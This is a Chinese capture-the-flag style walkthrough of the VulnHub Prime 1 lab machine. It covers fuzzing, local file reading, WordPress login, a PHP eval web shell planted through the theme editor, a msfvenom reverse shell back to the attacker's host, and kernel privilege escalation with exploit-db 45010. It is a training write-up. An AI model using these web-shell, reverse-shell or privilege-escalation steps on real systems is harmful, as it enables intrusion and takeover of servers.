环境说明：

靶机prime1和kali都使用的是NAT模式，网段在192.168.144.0/24。

Download (Mirror):

https://download.vulnhub.com/prime/Prime_Series_Level-1.rar

一.信息收集

1.主机探测：
使用nmap进行全面扫描扫描，找到目标地址及开放的端口：

nmap -A 192.168.144.0/24

发现目标主机的ip地址为192.168.144.178（判断依据：在144网段我只开放了两个主机，一个是kali，一个就是靶机（还是Ubuntu系统））

二.目录爆破

访问80端口，发现是一个图片，进行目录爆破。

使用kali的dirb工具进行爆破：

dirb http://192.168.144.178/

找到了几个目录，在逐一进行排查。

http://192.168.144.178/index.php           相当于192.168.144.178（/index.php是默认界面）

http://192.168.144.178/dev

http://192.168.144.178/wordpress/

http://192.168.144.178/dev里有这些信息。

hello,
now you are at level 0 stage.
In real life pentesting we should use our tools to dig on a web very hard.
Happy hacking. 

你好，
现在你处于0级阶段。
在现实生活中的渗透测试中，我们应该使用我们的工具在网络上非常努力地挖掘。
快乐的黑客。

http://192.168.144.178/wordpress/ 是个wordpress的cms

既然提示我们不够努力的挖掘信息，我们就再往深里收集。还是继续使用dirb工具当然使用burp工具也是可以的。

dirb http://192.168.144.178/ -X .php,.txt,.zip

如果对drib参数不太熟悉的可以看一下这个：
Kali Linux下Dirb工具web网站目录爆破指南 - 哔哩哔哩

发现多了两个新文件：

发现image.php和index.php文件的内容是一样的。

secret.txt的内容：

Looks like you have got some secrets.
Ok I just want to do some help to you. 
Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck 
Learn from here a basic tool with good usage for OSCP.
https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
//see the location.txt and you will get your next move//

看起来你有一些秘密。
好吧，我只是想帮你。
对你找到的php的每一页都做一些模糊处理。如果
您可以获得任何正确的参数，然后按照以下步骤操作。如果你仍然卡住了
从这里学习一个对OSCP有很好用法的基本工具。
https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
//查看location.txt，您将获得下一步行动//

三.WFUZZ工具的使用

就是想让我们去使用wfuzz工具（kali自带），要获得参数的话，还是要使用fuzz技术：

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt -u http://192.168.144.178/index.php?FUZZ

参数不了解的可以看一下这个文章：

渗透测试 10 --- 扫描 web目录 (dirb、wfuzz、wpscan、nikto)-CSDN博客

找到了file参数，如果不想翻的话，可以使用过滤进行查找，会方便很多。

 wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 -u http://192.168.144.178/index.php?FUZZ

把参数写到网址中，发现找错文件了，当然因为我还没写文件（苦笑），隐约还记得之前在secret.txt的文件说有一个location.txt的文件，咱们在进行查看。

然后就发现了，如下的提示：

翻译一下：

好吧，现在你知道确切的参数了

现在再挖一些下一个
在其他php页面上使用'secrettier360'参数可以获得更多乐趣。

意思是：让我们在别的php界面上去使用secrettier360参数，我们在信息收集的时候还发现了一个image.php的界面，去试了一下，成功找到正确的参数。

那我们就可以进行查看敏感路径了/etc/passwd

在saket用户这里发现了一个提示，我们进行尝试：发现了密码follow_the_ippsec

四.wordpress漏洞利用

于是我去试了一下靶机的登录密码，发现并不是，仔细回想一下信息收集，我们好像还有一个wordpress没有用，有概率会是它的密码

这里有个用户名，当然也可以使用bp进行爆破用户名，也是可以爆破出来的

登录成功：

我的插件也识别出来了wordpress的版本

主题编辑器，一般来说从主题编辑器容易有有写权限的一些目录，通过遍历来看看哪些目录有写权限。

可以在里面写入一句话木马，也可以使用反弹链接的方式。

<?php@eval($_POST['hack']);?>    输入进去，记得要保存

触发请求：可以通过下载cms的形式，找到secret.php它的路径

http://192.168.144.178/wordpress/wp-content/themes/twentynineteen/secret.php

使用蚁剑进行连接：

反弹连接也是如此：但是需要监听6666端口,也需要访问secret.php文件进行触发,我们使用msf进行完成：

制作php的payload：把payload的内容复制到secret.php文件中，并进行保存。

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.144.128 LPORT=6666 -f raw > shell2.php

启动监听：

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.144.128

set lport 6666

run

触发请求：反弹连接成功

五.权限提升

使用uname -a 查看它的ubuntu内核的版本信息

www-data@ubuntu:/tmp$ uname -a
uname -a
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64

找到符合的提权的脚本

把它复制到桌面，进行编译

cp /usr/share/exploitdb/exploits/linux/local/45010.c ./

gcc 45010.c -o 45010

把编译好的文件上传到靶机的/tmp目录下（该目录的普通用户也具有写的权限）

上传的方法：蚁剑进行上传，也可以使用msf的upload进行上传

给他加上可执行的权限：chmod +x 45010

运行：./45010

查看权限：是root，提权成功

注意如果有报错，说明kali的GLIBC的版本太高了，高版本编译的程序，无法在低版本的GLIBC环境运行。

解决方法：下载旧版kali或者使用我编译好的文件
链接: https://pan.baidu.com/s/1eM01n-EkE2cNT-MRfmkGWQ?pwd=pbz9 提取码: pbz9
最终找到flag。